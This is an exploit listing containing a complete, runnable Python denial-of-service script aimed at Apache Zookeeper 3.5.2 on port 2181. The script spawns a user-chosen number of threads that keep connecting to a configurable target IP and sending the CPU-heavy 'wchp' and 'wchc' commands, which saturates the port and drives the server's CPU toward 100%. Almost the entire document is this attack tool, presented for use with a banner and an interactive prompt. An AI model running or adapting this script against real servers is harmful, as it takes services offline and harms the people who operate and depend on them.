Zookeeper 3.5.2 - Denial of Service

1. #!/usr/bin/python
2.  
3. # Exploit Title: Zookeeper Client Denial Of Service (Port 2181)
4. # Date: 2/7/2017
5. # Exploit Author: Brandon Dennis
6. # Email: [email protected]
7. # Software Link: http://zookeeper.apache.org/releases.html#download
8. # Zookeeper Version: 3.5.2
9. # Tested on: Windows 2008 R2, Windows 2012 R2 x64 & x86
10. # Description: The wchp command to the ZK port 2181 will gather open internal files by each session/watcher and organize them for the requesting client.
11. #   This command is CPU intensive and will cause a denial of service to the port as well as spike the CPU of the remote machine to 90-100% consistently before any other traffic.
12. #   The average amount of threads uses was 10000 for testing. This should work on all 3.x+ versions of Zookeeper.
13. #   This should effect Linux x86 & x64 as well
14.  
15.  
16.  
17. import time
18. import os
19. import threading
20. import sys
21. import socket
22.  
23. numOfThreads = 1
24. exitStr = "n"
25. stop_threads = False
26. threads = []
27. ipAddress = "192.168.1.5" #Change this
28. port = 2181
29.  
30. def sendCommand(ipAddress, port):
31.     try:
32.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
33.         s.connect((ipAddress, port))
34.         s.send("wchp\r".encode("utf-8"))
35.         s.recv(1024)
36.         s.send("wchc\r".encode("utf-8"))
37.         s.close()
38.     except:
39.         pass
40.  
41.    
42. def runCMD(id, stop, ipAddress, port):
43.     while True:
44.         sendCommand(ipAddress, port)
45.         if stop():
46.             break
47.     return
48.    
49. def welcomeBanner():
50.     banner = """ _______   __  _____               _              
51. |___  | | / / /  __ \            | |              
52.   / /| |/ /  | /  \/_ __ __ _ ___| |__   ___ _ __
53.  / / |    \ | |   | '__/ _` / __| '_ \ / _ | '__|
54. ./ /__| |\ \ | \__/| | | (_| \__ | | | |  __| |  
55. \_____\_| \_/  \____|_|  \__,_|___|_| |_|\___|_|  
56.                                                  
57.                 By: Brandon Dennis
58.          Email: [email protected]
59.                  """
60.     print(banner)
61.    
62.  
63. welcomeBanner()
64. numOfThreads = int(input("How many threads do you want to use: "))
65. print ("Startin Up Threads...")
66. for i in range(numOfThreads):
67.     t = threading.Thread(target=runCMD, args=(id, lambda: stop_threads, ipAddress, port))
68.     threads.append(t)
69.     t.start()
70. print("Threads are now started...")
71.    
72.  
73. while exitStr != "y":
74.     inpt = input("Do you wish to stop threads(y): ")
75.    
76.     if inpt == "y":
77.         exitStr = "y"
78.  
79. print("\nStopping Threads...")
80. stop_threads = True    
81. for thread in threads:
82.     thread.join()
83.        
84. print("Threads are now stopped...")
85. sys.exit(0);